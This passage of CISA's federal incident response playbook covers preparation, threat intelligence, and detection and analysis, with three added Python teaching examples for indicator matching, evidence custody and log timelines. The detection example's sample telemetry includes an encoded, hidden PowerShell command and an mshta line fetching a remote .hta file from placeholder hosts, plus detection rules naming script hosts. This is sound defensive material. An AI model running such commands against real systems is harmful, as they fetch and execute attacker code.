




TLP:WHITE
CISA | Cybersecurity and Infrastructure Security Agency
CONTENTS
Introduction 3
Overview 3
Scope 3
Audience 4
Incident Response Playbook 5
Incident Response Process 5
Preparation Phase 6
Detection & Analysis 10
Containment 14
Eradication & Recovery 15
Post-Incident Activities 16
Coordination 17
Vulnerability Response Playbook 21
Preparation 21
Vulnerability Response Process 22
Identification 22
Evaluation 23
Remediation 24
Reporting and Notification 24
Appendix A: Key Terms 25
Appendix B: Incident Response Checklist 27
Appendix C: Incident Response Preparation Checklist 35
Appendix E: Vulnerability and Incident Categories 38
Appendix F: Source Text 39
Appendix G: Whole-of-Government Roles and Responsibilities 41
INTRODUCTION
The Cybersecurity and Infrastructure Security Agency (CISA) is committed to leading the response to cybersecurity incidents and vulnerabilities to safeguard the nation's critical assets. Section 6 of Executive Order 14028 directed DHS, via CISA, to "develop a standard set of operational procedures (playbook) to be used in planning and conducting cybersecurity vulnerability and incident response activity respecting Federal Civilian Executive Branch (FCEB) Information Systems." [1]
Overview
This document presents two playbooks: one for incident response and one for vulnerability response. These playbooks provide FCEB agencies with a standard set of procedures to identify, coordinate, remediate, recover, and track successful mitigations from incidents and vulnerabilities affecting FCEB systems, data, and networks. In addition, future iterations of these playbooks may be useful for organizations outside of the FCEB to standardize incident response practices. Working together across all federal government organizations has proven to be an effective model for addressing vulnerabilities and incidents. Building on lessons learned from previous incidents and incorporating industry best practices, CISA intends for these playbooks to evolve the federal government's practices for cybersecurity response through standardizing shared practices that bring together the best people and processes to drive coordinated actions.
The standardized processes and procedures described in these playbooks:
• Facilitate better coordination and effective response among affected organizations,
• Enable tracking of cross-organizational successful actions,
• Allow for cataloging of incidents to better manage future events, and
• Guide analysis and discovery.
Agencies should use these playbooks to help shape overall defensive cyber operations to ensure consistent and effective response and coordinated communication of response activities.
Scope
These playbooks are for FCEB entities to focus on criteria for response and thresholds for coordination and reporting. They include communications between FCEB entities and CISA; the connective coordination between incident and vulnerability response activities; and common definitions for key cybersecurity terms and aspects of the response process. Response activities in scope of this playbook include those:
• Initiated by an FCEB agency (e.g., a local detection of malicious activity or discovery of a vulnerability)
• Initiated by CISA (e.g., a CISA alert or directive) or other third parties, including law enforcement, intelligence agencies, or commercial organizations, contractors, and service providers
The Incident Response Playbook applies to incidents that involve confirmed malicious cyber activity and for which a major incident (as defined by the Office of Management and Budget [OMB] in Memorandum M-20-04 [2] or successor memorandum) has been declared or not yet been reasonably ruled out. The Vulnerability Response Playbook applies to vulnerabilities being actively exploited in the wild. As required by EO 14028, the Director of OMB will issue guidance on FCEB agency use of these playbooks.
Note: these playbooks do not cover response activities that involve threats to classified information or National Security Systems (NSS) as defined by 44 U.S.C. 3552(b)(6). See CNSSI 1010 [3] for coordination/reporting guidance for incidents specific to NSS or systems that process classified information.
Audience
These playbooks apply to all FCEB agencies, information systems used or operated by an agency, a contractor of an agency, or another organization on behalf of an agency. It is the policy of the federal government that information and communications technology (ICT) service providers who have contracted with FCEB agencies must promptly report incidents to such agencies and to CISA. [4]
[1] Executive Order (EO) 14028: Improving the Nation's Cybersecurity
[2] Office of Management and Budget (OMB) Memorandum M-20-04: Fiscal Year 2019-2020 Guidance on Federal Information Security and Privacy Management Requirements
[3] Committee on National Security Systems
[4] EO 14028, Sec. 2. Removing Barriers to Sharing Threat Information
INCIDENT RESPONSE PLAYBOOK
When to use this playbook
Use this playbook for incidents that involve confirmed malicious cyber activity for which a major incident has been declared or not yet been reasonably ruled out.
For example:
• Incidents involving lateral movement, credential access, exfiltration of data
• Network intrusions involving more than one user or system
• Compromised administrator accounts
This playbook does not apply to activity that does not appear to have such major incident potential, such as:
• "Spills" of classified information or other incidents that are believed to result from unintentional behavior only
• Users clicking on phishing emails when no compromise results
• Commodity malware on a single machine or lost hardware that, in either case, is not likely to result in demonstrable harm to the national security interests, foreign relations, or economy of the United States or to the public confidence, civil liberties, or public health and safety of the American people.
This playbook provides a standardized response process for cybersecurity incidents and describes the process and completion through the incident response phases as defined in National Institute of Standards and Technology (NIST) Special Publication (SP) 800-61 Rev. 2, [5] including preparation, detection and analysis, containment, eradication and recovery, and post-incident activities. This playbook describes the process FCEB agencies should follow for confirmed malicious cyber activity for which a major incident has been declared or not yet been reasonably ruled out.
Incident response can be initiated by several types of events, including but not limited to:
• Automated detection systems or sensor alerts
• Agency user report
• Contractor or third-party ICT service provider report
• Internal or external organizational component incident report or situational awareness update
• Third-party reporting of network activity to known compromised infrastructure, detection of malicious code, loss of services, etc.
• Analytics or hunt teams that identify potentially malicious or otherwise unauthorized activity
Incident Response Process
The incident response process starts with the declaration of the incident, as shown in Figure 1. In this context, "declaration" refers to the identification of an incident and communication to CISA and agency network defenders rather than formal declaration of a major incident as defined in applicable law and policy. Succeeding sections, which are organized by phases of the IR lifecycle, describe each step in more detail. Many activities are iterative and may continuously occur and evolve until the incident is closed out. Figure 1 illustrates incident response activities in terms of these phases, and Appendix B provides a companion checklist to track activities to completion.
[5] NIST Special Publication (SP) 800-61 Rev. 2: Computer Security Incident Handling Guide
Figure 1: Incident Response Process
Preparation Phase
Prepare for major incidents before they occur to mitigate any impact on the organization. Preparation activities include:
• Documenting and understanding policies and procedures for incident response
• Instrumenting the environment to detect suspicious and malicious activity
• Establishing staffing plans
• Educating users on cyber threats and notification procedures
• Leveraging cyber threat intelligence (CTI) to proactively identify potential malicious activity
Define baseline systems and networks before an incident occurs to understand the basics of "normal" activity. Establishing baselines enables defenders to identify deviations. Preparation also includes:
• Having infrastructure in place to handle complex incidents, including classified and out-of-band communications
• Developing and testing courses of action (COAs) for containment and eradication
• Establishing means for collecting digital forensics and other data or evidence
The goal of these items is to ensure resilient architectures and systems to maintain critical operations in a compromised state. Active defense measures that employ methods such as redirection and monitoring of adversary activities may also play a role in developing a robust incident response. [6]
[6] For example, "Deception: Mislead, confuse, hide critical assets from, or expose covertly tainted assets to the adversary," as defined in NIST SP 800-160 Vol. 2: Developing Cyber Resilient Systems: A Systems Security Engineering Approach.
Preparation Activities
Policies and Procedures
Document incident response plans, including processes and procedures for designating a coordination lead (incident manager). Put policies and procedures in place to escalate and report major incidents and those with impact on the agency's mission. Document contingency plans for additional resourcing and "surge support" with assigned roles and responsibilities. Policies and plans should address notification, interaction, and evidence sharing with law enforcement.
Instrumentation
Develop and maintain an accurate picture of infrastructure (systems, networks, cloud platforms, and contractor-hosted networks) by widely implementing telemetry to support system and sensor-based detection and monitoring capabilities such as antivirus (AV) software; endpoint detection and response (EDR) solutions; [7] data loss prevention (DLP) capabilities; intrusion detection and prevention systems (IDPS); authorization, host, application and cloud logs; [8] network flows, packet capture (PCAP); and security information and event management (SIEM) systems. Monitor for alerts generated by CISA's EINSTEIN intrusion detection system and Continuous Diagnostics and Mitigation (CDM) program to detect changes in cyber posture. Implement additional requirements for logging, log retention, and log management based on Executive Order 14028, Sec. 8. Improving the Federal Government's Investigative and Remediation Capabilities, [9] and ensure those logs are collected centrally.
Trained Response Personnel
Ensure personnel are trained, exercised, and ready to respond to cybersecurity incidents. Train all staffing resources that may draw from in-house capabilities, available capabilities at a parent agency/department, a third-party organization, or a combination thereof. Conduct regular recovery exercises to test the full organizational continuity of operations plan (COOP) and failover/backup/recovery systems to be sure these work as planned.
Cyber Threat Intelligence
Actively monitor intelligence feeds for threat or vulnerability advisories from government, trusted partners, open sources, and commercial entities. Cyber threat intelligence can include threat landscape reporting, threat actor profiles and intents, organizational targets and campaigns, as well as more specific threat indicators and courses of action. Ingest cyber threat indicators and integrated threat feeds into a SIEM, and use other defensive capabilities to identify and block known malicious behavior. Threat indicators can include:
• Atomic indicators, such as domains and IP addresses, that can detect adversary infrastructure and tools
• Computed indicators, such as Yara rules and regular expressions, that detect known malicious artifacts or signs of activity
• Patterns and behaviors, such as analytics that detect adversary tactics, techniques, and procedures (TTPs)
Atomic indicators can initially be valuable to detect signs of a known campaign. However, because adversaries often change their infrastructure (e.g., watering holes, botnets, C2 servers) between campaigns, the "shelf-life" of atomic indicators to detect new adversary activity is limited. In addition, advanced threat actors might leverage different infrastructure against different targets or switch to new infrastructure during a campaign when their activities are detected. Finally, adversaries often hide in their targeted environments, using native operating system utilities and other resources to achieve their goals. For these reasons, agencies should use patterns and behaviors, or adversary TTPs, to identify malicious activity when possible. Although detection methods for TTPs are more difficult to apply and to verify once applied, TTPs provide more useful and sustainable context about threat actors, their intentions, and their methods than atomic indicators alone. The MITRE ATT&CK® framework documents and explains adversary TTPs in detail, making it a valuable resource for network defenders. [10]
[7] EO 14028, Sec. 7. Improving Detection of Cybersecurity Vulnerabilities and Incidents on Federal Government Networks
[8] NIST SP 800-92: Guide to Computer Security Log Management
[9] EO 14028, Sec. 8. Improving the Federal Government's Investigative and Remediation Capabilities
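As an added example (not part of the CISA playbook) of the three indicator classes above, the following Python runs an atomic IOC match, a computed indicator (a regular expression for an encoded PowerShell command line), and a behavioral rule (an Office application spawning a script host that then makes an outbound connection) over constructed endpoint telemetry. Every host name, domain, IP address and command line is made up for illustration; the second workstation reuses the same TTP against new infrastructure, so only the behavioral rule catches it.

```python
"""Atomic vs. computed vs. behavioral indicators over constructed endpoint telemetry.

Added illustration; all hosts, domains, IPs and command lines are made up.
"""
import re
from dataclasses import dataclass

# Atomic indicators from a hypothetical earlier campaign (constructed, not real IOCs).
ATOMIC_IOCS = {
    "domains": {"update-cdn.example.net"},
    "ips": {"203.0.113.45"},
}

# Computed indicator: PowerShell launched with an encoded command of 20+ base64 characters.
ENCODED_PS = re.compile(
    r"(?i)powershell(?:\.exe)?\b.*\s-(?:e|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}"
)

# Behavioral rule (TTP level): an Office application spawns a script host that then
# makes an outbound connection. It does not depend on any particular infrastructure.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "mshta.exe", "wscript.exe", "cscript.exe"}


@dataclass(frozen=True)
class ProcessEvent:
    host: str
    parent: str
    image: str
    cmdline: str
    dest_ip: str = ""
    dest_domain: str = ""


# Constructed telemetry. ws01 is the known campaign; ws02 reuses the same TTP with
# new infrastructure; ws03 is a legitimate scheduled PowerShell job (baseline noise).
EVENTS = [
    ProcessEvent("ws01", "explorer.exe", "winword.exe", "WINWORD.EXE /n invoice.docm"),
    ProcessEvent("ws01", "winword.exe", "powershell.exe",
                 "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA",
                 dest_ip="203.0.113.45", dest_domain="update-cdn.example.net"),
    ProcessEvent("ws02", "explorer.exe", "excel.exe", "EXCEL.EXE budget.xlsm"),
    ProcessEvent("ws02", "excel.exe", "mshta.exe", "mshta.exe https://files.example.org/x.hta",
                 dest_ip="198.51.100.7", dest_domain="files.example.org"),
    ProcessEvent("ws03", "services.exe", "powershell.exe", "powershell.exe -File C:\\ops\\patch.ps1"),
]


def match_atomic(events, iocs=ATOMIC_IOCS):
    """Atomic: exact match on destination IP or domain."""
    return [e for e in events if e.dest_ip in iocs["ips"] or e.dest_domain in iocs["domains"]]


def match_computed(events, pattern=ENCODED_PS):
    """Computed: regular expression over the command line."""
    return [e for e in events if pattern.search(e.cmdline)]


def match_behavioral(events):
    """Behavioral: parent/child relationship plus a network connection."""
    return [
        e for e in events
        if e.parent.lower() in OFFICE_PARENTS
        and e.image.lower() in SCRIPT_HOSTS
        and (e.dest_ip or e.dest_domain)
    ]


def hosts_hit(matches):
    return sorted({e.host for e in matches})


def coverage(events=EVENTS):
    """Which hosts each indicator class flags; exposes the shelf-life gap of atomic IOCs."""
    return {
        "atomic": hosts_hit(match_atomic(events)),
        "computed": hosts_hit(match_computed(events)),
        "behavioral": hosts_hit(match_behavioral(events)),
    }


if __name__ == "__main__":
    for kind, hosts in coverage().items():
        print(f"{kind:<10} {hosts}")
```

The atomic list is the shortest-lived of the three: once the operator moves to new infrastructure it produces nothing, while the process-tree rule keeps firing because it keys on what the adversary has to do rather than where they connect. Behavioral rules also have to be tuned against the baseline; the `services.exe`-launched script on `ws03` is a legitimate job and does not match.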
Sharing cyber threat intelligence is a critical element of preparation. FCEB agencies are strongly encouraged to continuously share cyber threat intelligence, including adversary indicators, TTPs, and associated defensive measures (also known as "countermeasures"), with CISA and other partners. The primary method for sharing cyber threat information, indicators, and associated defensive measures with CISA is via the Automated Indicator Sharing (AIS) program. [11]
FCEB agencies should be enrolled in AIS. If the agency is not enrolled in AIS, contact CISA for more information. [12]
Agencies should use the Cyber Threat Indicator and Defensive Measures Submission System, a secure, web-enabled method, to share with CISA cyber threat indicators and defensive measures that are not applicable or appropriate to share via AIS. [13]
[10] See Best Practices for MITRE ATT&CK® Mapping Framework for guidance on using ATT&CK to analyze and report on cybersecurity threats.
[11] CISA Automated Indicator Sharing
[12] CISA Automated Indicator Sharing
Active Defense
FCEB agencies with advanced defensive capabilities and staff might establish active defense capabilities, such as the ability to redirect an adversary to a sandbox or honeynet system for additional study, or "darknets", to delay the ability of an adversary to discover the agency's legitimate infrastructure. Network defenders can implement honeytokens (fictitious data objects) and fake accounts to act as canaries for malicious activity. These capabilities enable defenders to study the adversary's behavior and TTPs and thereby build a full picture of adversary capabilities.
Communications and Logistics
Establish local and cross-agency communication procedures and mechanisms for coordinating major incidents with CISA and other sharing partners and determine the information sharing protocols to use (i.e., agreed-upon standards). Define methods for handling classified information and data, if required. Establish communication channels (chat rooms, phone bridges) and a method for out-of-band coordination. [14]
Operational Security (OPSEC)
Take steps to ensure that IR and defensive systems and processes will be operational during an attack, particularly in the event of pervasive compromises, such as a ransomware attack or one involving an aggressive attacker that may attempt to undermine defensive measures and distract or mislead defenders. These measures include:
• Segmenting and managing SOC systems separately from the broader enterprise IT systems,
• Managing sensors and security devices via out-of-band means,
• Notifying users of compromised systems via phone rather than email,
• Using hardened workstations to conduct monitoring and response activities, and
• Ensuring that defensive systems have robust backup and recovery processes.
Avoid "tipping off" an attacker by having processes and systems that reduce the likelihood of detection of IR activities (e.g., do not submit malware samples to a public analysis service or notify users of potentially compromised machines via email).
[13] DHS CISA Cyber Threat Indicator and Defensive Measure Submission System
[14] NIST SP 800-47 Rev. 1: Managing the Security of Information Exchanges
Technical Infrastructure
Implement capabilities to contain, replicate, analyze, reconstitute, and document compromised hosts; implement the capability to collect digital forensics and other data. Establish secure storage (i.e., only accessible by incident responders) for incident data and reporting. Provide means for collecting forensic evidence, such as disk and active memory imaging, and means for safely handling malware. Obtain analysis tools and sandbox software for analyzing malware. Implement a ticketing or case management system that captures pertinent details of:
• Anomalous or suspicious activity, such as affected systems, applications, and users;
• Activity type;
• Specific threat group(s);
• Adversary tactics, techniques, and procedures (TTPs) employed; and
• Impact.
Detect Activity
Leverage threat intelligence to create rules and signatures to identify the activity associated with the incident and to scope its reach. Configure tools and analyze logs and alerts. Look for signs of incident activity and potentially related information to determine the type of incident, e.g., malware attack, system compromise, session hijack, data corruption, data exfiltration, etc.
See Appendix C for a checklist for preparation activities.
Detection & Analysis
The most challenging aspect of the incident response process is often accurately detecting and assessing cybersecurity incidents: determining whether an incident has occurred and, if so, the type, extent, and magnitude of the compromise within cloud, operational technology (OT), hybrid, host, and network systems. To detect and analyze events, implement defined processes, appropriate technology, and sufficient baseline information to monitor, detect, and alert on anomalous and suspicious activity. Ensure there are procedures to deconflict potential incidents with authorized activity (e.g., confirm that a suspected incident is not simply a network administrator using remote admin tools to perform software updates). As the U.S. government's lead for asset response, CISA will partner with affected agencies in all aspects of the detection and analysis process.
Detection & Analysis Activities
Declare Incident
Declare an incident by reporting it to CISA at / and alerting agency IT leadership to the need for investigation and response. CISA can assist in determining the severity of the incident and whether it should be declared a major incident. Note: FCEB agencies must promptly report all cybersecurity incidents, regardless of severity, to CISA.
Determine Investigation Scope
Use available data to identify the type of access, the extent to which assets have been affected, the level of privilege attained by the adversary, and the operational or informational impact. Discover associated malicious activity by following the trail of network data; discover associated host-based artifacts by examining host, firewall, and proxy logs along with other network data, such as router traffic. Initial scoping of an incident to determine adversarial activity may include analyzing results from:
• An automated detection system or sensor;
• A report from a user, contractor, or third-party information and communication technologies (ICT) service provider; or
• An incident report or situational awareness update from other internal or external organizational components.
[15] NIST SP 800-61 Rev. 2: Computer Security Incident Handling Guide
Collect and Preserve Data
Collect and preserve data for incident verification, categorization, prioritization, mitigation, reporting, and attribution. When necessary and possible, such information should be preserved and safeguarded as best evidence for use in any potential law enforcement investigation. Collect data from the perimeter, the internal network, and the endpoint (server and host). Collect audit, transaction, intrusion, connection, system performance, and user activity logs. When an endpoint requires forensic analysis, capture a memory and disk image for evidence preservation. Collect evidence, including forensic data, according to procedures that meet all applicable policies and standards and account for it in a detailed log that is kept for all evidence. For more information, see NIST Computer Security Incident Handling Guide, SP 800-61r2. [15]
Extract all relevant threat information (atomic, computed, and behavioral indicators and countermeasures) to share with IR teams and with CISA.
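One way to keep the "detailed log that is kept for all evidence" called for above, as an added example that is not part of the playbook: the Python below records each acquired image in a manifest with its SHA-256 and size, appends a custody event (re-hashing the bytes) at every hand-off, and verifies that the bytes still match the acquisition hash so that any alteration is pinned to a specific hand-off. The evidence bytes, item IDs, analyst names, tool name and host name are constructed placeholders.

```python
"""Evidence manifest with integrity hashes and a chain-of-custody log.

Added illustration; the evidence bytes, IDs, names and tool are constructed placeholders.
"""
import hashlib
import json
from datetime import datetime, timezone


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def _now() -> str:
    return datetime.now(timezone.utc).isoformat()


def register_evidence(item_id, description, data, acquired_by, tool, source_host):
    """Create a manifest entry at acquisition time; the hash taken here is the reference value."""
    digest = sha256_hex(data)
    stamp = _now()
    return {
        "item_id": item_id,
        "description": description,
        "source_host": source_host,
        "size_bytes": len(data),
        "sha256": digest,
        "acquired_at": stamp,
        "acquired_by": acquired_by,
        "tool": tool,
        "custody": [{"at": stamp, "who": acquired_by, "action": "acquired", "sha256": digest}],
    }


def transfer_custody(entry, from_who, to_who, data):
    """Record a hand-off. The receiver re-hashes the bytes they actually received,
    so a modification between two custodians shows up at that exact step."""
    entry["custody"].append({
        "at": _now(),
        "who": to_who,
        "action": f"received from {from_who}",
        "sha256": sha256_hex(data),
    })
    return entry


def verify_evidence(entry, data) -> bool:
    """True only if the bytes still hash to the value recorded at acquisition."""
    return len(data) == entry["size_bytes"] and sha256_hex(data) == entry["sha256"]


def custody_is_consistent(entry) -> bool:
    """True if every custody event recorded the acquisition hash."""
    return all(ev["sha256"] == entry["sha256"] for ev in entry["custody"])


def first_broken_handoff(entry):
    """Index of the first custody event whose hash differs, or None if the chain is intact."""
    for i, ev in enumerate(entry["custody"]):
        if ev["sha256"] != entry["sha256"]:
            return i
    return None


def manifest_json(entries) -> str:
    return json.dumps(entries, indent=2, sort_keys=True)


# Constructed sample bytes standing in for a memory image and a disk image.
MEM_IMAGE = b"\x00" * 64 + b"constructed memory image of ws01"
DISK_IMAGE = b"constructed raw disk image of ws01" + b"\xff" * 128


if __name__ == "__main__":
    mem = register_evidence("E-001", "memory image", MEM_IMAGE, "analyst1", "imaging-tool", "ws01")
    disk = register_evidence("E-002", "disk image", DISK_IMAGE, "analyst1", "imaging-tool", "ws01")
    transfer_custody(mem, "analyst1", "analyst2", MEM_IMAGE)
    print(manifest_json([mem, disk]))
    print("mem image intact:", verify_evidence(mem, MEM_IMAGE))
```

Hashing at each hand-off rather than only at acquisition is the point: a single reference hash tells you the evidence was altered, while a per-custodian hash tells you between which two signatures it happened.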
Perform Technical Analysis
Develop a technical and contextual understanding of the incident. Correlate information, assess anomalous activity against a known baseline to determine root cause, and document adversary TTPs to enable prioritization of the subsequent response activities. The goal of this analysis is to examine the breadth of data sources throughout the environment to discover at least some part of an attack chain, if not all of it. As information evolves and the investigation progresses, update the scope to incorporate new information.
Correlate Events and Document Timeline
Acquire, store, and analyze logs to correlate adversarial activity. Table 1 presents an example of logs and event data that are commonly employed to detect and analyze attacker activities. [16], [17]
A simple knowledge base should be established for reference during response to the incident. Thoroughly document every step taken during this and subsequent phases. Create a timeline of all relevant findings. The timeline will allow the team to account for all adversary activity on the network and will assist in creating the findings report at the conclusion of the response.
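As an added example (not from the playbook) of building the timeline described above, the following Python normalizes three constructed log formats (a syslog line that carries no year and is stamped in local time, a Windows-style event with a UTC timestamp, and a proxy log with an explicit offset) into timezone-aware UTC, sorts them into a single timeline, and pulls out the events within a window of any anchor event. The hosts, accounts, IP addresses, the year, and the UTC-5 offset of the syslog source are assumptions for the sample; in practice the offset comes from the host's configuration and must be recorded with the evidence.

```python
"""Build one UTC timeline from constructed logs in three formats.

Added illustration; the log lines, hosts, accounts and the syslog host's
timezone (UTC-5) and year (2024) are assumptions for the sample.
"""
import re
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone

SYSLOG_TZ = timezone(timedelta(hours=-5))   # assumed local offset of the syslog source
SYSLOG_YEAR = 2024                           # syslog lines carry no year; assumed
ONE_MINUTE = timedelta(minutes=1)

SYSLOG = re.compile(r"^(?P<ts>[A-Z][a-z]{2} +\d{1,2} \d{2}:\d{2}:\d{2}) (?P<host>\S+) (?P<msg>.*)$")
WINEVT = re.compile(r"^(?P<ts>\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}Z) (?P<host>\S+) (?P<msg>EventID=\d+ .*)$")
PROXY = re.compile(r"^(?P<host>\S+) \[(?P<ts>[^\]]+)\] (?P<msg>.*)$")


@dataclass(frozen=True)
class Event:
    ts: datetime   # always timezone-aware UTC after parsing
    host: str
    source: str
    msg: str


def parse_line(line: str) -> Event:
    """Recognise the format, parse its timestamp, and convert to UTC."""
    m = SYSLOG.match(line)
    if m:
        local = datetime.strptime(f"{SYSLOG_YEAR} {m['ts']}", "%Y %b %d %H:%M:%S")
        ts = local.replace(tzinfo=SYSLOG_TZ).astimezone(timezone.utc)
        return Event(ts, m["host"], "syslog", m["msg"])
    m = WINEVT.match(line)
    if m:
        ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
        return Event(ts, m["host"], "winevt", m["msg"])
    m = PROXY.match(line)
    if m:
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z").astimezone(timezone.utc)
        return Event(ts, m["host"], "proxy", m["msg"])
    raise ValueError(f"unrecognised log line: {line!r}")


def build_timeline(lines):
    """Parse every non-empty line and order the events by UTC time."""
    return sorted((parse_line(l) for l in lines if l.strip()), key=lambda e: e.ts)


def events_within(timeline, anchor, window=ONE_MINUTE):
    """Events from any source within +/- window of an anchor time: the pivot step."""
    return [e for e in timeline if abs(e.ts - anchor) <= window]


def render(timeline):
    return [f"{e.ts.strftime('%Y-%m-%dT%H:%M:%SZ')} {e.source:<7} {e.host:<9} {e.msg}" for e in timeline]


# Constructed sample: a failed then successful logon to a file server, a jump host
# SSH logon (local time, UTC-5) two seconds earlier, and a large proxy CONNECT after.
SAMPLE_LINES = [
    "2024-01-14T08:12:09Z srv-fs01 EventID=4624 LogonType=3 Account=svc_backup Source=10.0.8.15",
    "Jan 14 03:12:07 jump01 sshd[2231]: Accepted password for svc_backup from 10.0.8.15 port 51022",
    "proxy01 [14/Jan/2024:08:12:30 +0000] CONNECT 198.51.100.7:443 user=svc_backup bytes=1048576",
    "2024-01-14T07:55:00Z srv-fs01 EventID=4625 LogonType=3 Account=svc_backup Source=10.0.8.15",
]


if __name__ == "__main__":
    tl = build_timeline(SAMPLE_LINES)
    print("\n".join(render(tl)))
    print("within one minute of the SSH logon:",
          len(events_within(tl, tl[1].ts)))
```

Without the conversion, the syslog entry would sort five hours earlier than the logon it actually preceded by two seconds, and the pivot around the SSH logon would miss the file-server logon and the outbound transfer that followed it.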
Identify Anomalous Activity
Assess and profile affected systems and networks for subtle activity that might be adversary behavior. Adversaries will often use legitimate, native operating system utilities and scripting languages once they gain a foothold in an environment to avoid detection. This process will enable the team to identify deviations from the established baseline activity and can be particularly important in identifying activities such as attempts to leverage legitimate credentials and native capabilities in the environment.
Identify Root Cause and Enabling Conditions
Attempt to identify the root cause of the incident and collect threat information that can be used in further searches and to inform subsequent response efforts. Identify the conditions that enabled the adversary to access and operate within the environment. These conditions will inform triage and post-incident activity. Assess networks and systems for changes that may have been made to either evade defenses or facilitate persistent access.
Gather Incident Indicators
Identify and document indicators that can be used for correlative analysis on the network. Indicators can provide insight into the adversary's capabilities and infrastructure. Indicators as standalone artifacts are valuable in the early stages of incident response.
Analyze for Common Adversary TTPs
Compare TTPs to adversary TTPs documented in ATT&CK and analyze how the TTPs fit into the attack lifecycle. TTPs describe "why," "what," and "how." Tactics describe the technical objective an adversary is trying to achieve ("why"), techniques are different mechanisms they use to achieve it ("what"), and procedures are exactly how the adversary achieves a specific result ("how"). Responding to TTPs enables defenders to
[16] Derived from the MITRE ATT&CK® Framework. Note: this table is a representative sampling of common tactics, techniques, and related logs, and is not intended to be complete.